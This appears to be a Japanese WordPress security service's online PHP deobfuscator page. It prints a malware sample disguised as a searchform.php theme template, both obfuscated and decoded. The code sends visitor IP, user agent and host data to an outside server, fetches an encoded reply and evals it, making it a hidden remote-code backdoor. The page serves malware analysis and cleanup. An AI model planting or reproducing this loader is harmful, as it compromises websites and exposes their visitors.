Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php /* * The searchform.php template. * * Used any time that get_search_form() is called. * * @link https://wordpress.org/themes/template/ * @package WordPress * @subpackage * @since 1.0 */ $EisCC="n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";$GKotnoU='base64...



難読化されたPHPコード

<?php


/* 
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage 
 * @since 1.0 */
 



$EisCC="n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";$GKotnoU='base64_decode';$vXKzarSqz = $EisCC[64].$EisCC[7].$EisCC[26].$EisCC[57].$EisCC[26].$EisCC[64];$UlfmeWlz = "auth.php";$dsH = "http://";$dsH .= $vXKzarSqz;$dsH .= '/';$dsH .= $UlfmeWlz;$agkH = urlencode((isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $_SERVER[$EisCC[65].$EisCC[5].$EisCC[58]]));$PYBFUMzJv = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[61].$EisCC[39].$EisCC[37].$EisCC[2]];$rDd = $_SERVER["SCRIPT_NAME"];if (isset($_SERVER['HTTP_CLIENT_IP'])) $PLxAVm = $_SERVER['HTTP_CLIENT_IP'];elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $PLxAVm = $_SERVER['HTTP_X_FORWARDED_FOR'];elseif(isset($_SERVER['HTTP_X_FORWARDED'])) $PLxAVm = $_SERVER['HTTP_X_FORWARDED'];elseif(isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) $PLxAVm = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];elseif(isset($_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32]])) $PLxAVm = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32]];elseif(isset($_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58]])) $PLxAVm = $_SERVER[$EisCC[61].$EisCC[2].$EisCC[2].$EisCC[65].$EisCC[18].$EisCC[33].$EisCC[39].$EisCC[32].$EisCC[5].$EisCC[69].$EisCC[32].$EisCC[58].$EisCC[70].$EisCC[58]];elseif(isset($_SERVER[$EisCC[32].$EisCC[70].$EisCC[6].$EisCC[39].$EisCC[2].$EisCC[70].$EisCC[18].$EisCC[69].$EisCC[58].$EisCC[58].$EisCC[32]])) $PLxAVm = $_SERVER[$EisCC[32].$EisCC[70].$EisCC[6].$EisCC[39].$EisCC[2].$EisCC[70].$EisCC[18].$EisCC[69].$EisCC[58].$EisCC[58].$EisCC[32]];else $PLxAVm = 'UNKNOWN';$yVmUFDc = $EisCC[56].$EisCC[67].$EisCC[67].$EisCC[22].$EisCC[45].$EisCC[52].$EisCC[44].$EisCC[48].$EisCC[16].$EisCC[45].$EisCC[20].$EisCC[68].$PLxAVm.$EisCC[16].$EisCC[38].$EisCC[28].$EisCC[68].$agkH.$EisCC[16].$EisCC[17].$EisCC[67].$EisCC[4].$EisCC[31].$EisCC[68].$PYBFUMzJv.';req='.$rDd.';';$AFCLFaeBi = array('http'=>array('method'=>'GET', 'header'=>$yVmUFDc));if( function_exists($GKotnoU('Y3'.'Vy'.'bF9p'.'bm'.'l0')) ) { $ttekHhTRK = curl_init(); $DGxuu = array(10023 => array($yVmUFDc),10002 => $dsH,19913 => 1,64 => false,52 => true,42 => false); curl_setopt_array($ttekHhTRK, $DGxuu); $ttekHhTRK2 = curl_exec($ttekHhTRK); curl_close($ttekHhTRK);}else { $ttekHhTRK2 = @file_get_contents($dsH,false,stream_context_create($AFCLFaeBi)); }$ttekHhTRK2 = str_rot13($ttekHhTRK2);$ttekHhTRK2 = $GKotnoU($ttekHhTRK2);if(stripos($ttekHhTRK2,'fa704e7366d666bd')!==FALSE) eval($ttekHhTRK2);

?>

デコード(難読化解除)されたコード

<?php

/* 
 * The searchform.php template.
 *
 * Used any time that get_search_form() is called.
 *
 * @link https://wordpress.org/themes/template/
 * @package WordPress
 * @subpackage 
 * @since 1.0 */
$EisCC = "n5TdsWMvfU67VXw&;h_GpykLBjc8a2NtRFI-mSuO0J9>:ilZ gz1e4QKC.D3/HYqxPro=AEb";
$GKotnoU = 'base64_decode';
$vXKzarSqz = "xvc.cx";
$UlfmeWlz = "auth.php";
$dsH = "http://";
$dsH = "http://xvc.cx";
$dsH = "http://xvc.cx/";
$dsH = "http://xvc.cx/auth.php";
$agkH = urlencode(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $_SERVER["PWD"]);
$PYBFUMzJv = $_SERVER["HTTP_HOST"];
$rDd = $_SERVER["SCRIPT_NAME"];
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
    $PLxAVm = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $PLxAVm = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
    $PLxAVm = $_SERVER['HTTP_X_FORWARDED'];
} elseif (isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) {
    $PLxAVm = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
} elseif (isset($_SERVER["HTTP_FORWARDED_FOR"])) {
    $PLxAVm = $_SERVER["HTTP_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_FORWARDED"])) {
    $PLxAVm = $_SERVER["HTTP_FORWARDED"];
} elseif (isset($_SERVER["REMOTE_ADDR"])) {
    $PLxAVm = $_SERVER["REMOTE_ADDR"];
} else {
    $PLxAVm = 'UNKNOWN';
}
$yVmUFDc = $EisCC[56] . $EisCC[67] . $EisCC[67] . $EisCC[22] . $EisCC[45] . $EisCC[52] . $EisCC[44] . $EisCC[48] . $EisCC[16] . $EisCC[45] . $EisCC[20] . $EisCC[68] . $PLxAVm . $EisCC[16] . $EisCC[38] . $EisCC[28] . $EisCC[68] . $agkH . $EisCC[16] . $EisCC[17] . $EisCC[67] . $EisCC[4] . $EisCC[31] . $EisCC[68] . $PYBFUMzJv . ';req=' . $rDd . ';';
$AFCLFaeBi = array('http' => array('method' => 'GET', 'header' => $yVmUFDc));
if (function_exists($GKotnoU('Y3VybF9pbml0'))) {
    $ttekHhTRK = curl_init();
    $DGxuu = array(10023 => array($yVmUFDc), 10002 => $dsH, 19913 => 1, 64 => false, 52 => true, 42 => false);
    curl_setopt_array($ttekHhTRK, $DGxuu);
    $ttekHhTRK2 = curl_exec($ttekHhTRK);
    curl_close($ttekHhTRK);
} else {
    $ttekHhTRK2 = @file_get_contents($dsH, false, stream_context_create($AFCLFaeBi));
}
$ttekHhTRK2 = str_rot13($ttekHhTRK2);
$ttekHhTRK2 = $GKotnoU($ttekHhTRK2);
if (stripos($ttekHhTRK2, 'fa704e7366d666bd') !== FALSE) {
    eval($ttekHhTRK2);
}


■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.